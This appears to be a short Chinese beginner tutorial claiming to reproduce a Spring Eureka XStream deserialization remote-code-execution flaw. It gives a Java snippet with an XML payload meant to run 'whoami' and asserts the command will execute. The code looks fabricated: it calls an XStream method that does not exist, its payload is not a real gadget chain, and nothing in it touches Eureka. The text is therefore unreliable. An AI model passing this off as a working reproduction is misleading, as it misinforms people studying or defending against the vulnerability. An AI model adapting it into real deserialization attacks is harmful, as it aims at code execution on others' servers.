小白实战 | spring Eureka Xstream Deserialization RCE 漏洞复现

要复现Spring Eureka XStream反序列化攻击（RCE）漏洞，你需要满足以下条件：

1. 安装Java环境（JRE或JDK）。
2. 下载或者安装一个具有Eureka服务器的Spring应用。
3. 了解XStream库的使用。

以下是一个简单的复现步骤：

1. 创建一个包含漏洞的XStream类：

import com.thoughtworks.xstream.XStream;
 
public class XStreamTest {
    public static void main(String[] args) {
        XStream xstream = new XStream();
        String payload = "<java.lang.Runtime><run class=\"java.lang.ProcessBuilder\"><command><string>whoami</string></command></run></java.lang.Runtime>";
        Object obj = xstream.fromXML(payload);
        xstream.convertAnnotatedBean(obj, "");
    }
}

2. 运行上述代码，如果环境配置正确，将会执行whoami命令。

请注意，此代码仅用于学习目的，不推荐在生产环境中使用。对于实际环境，应该更新到安全的版本，并且采取其他安全措施。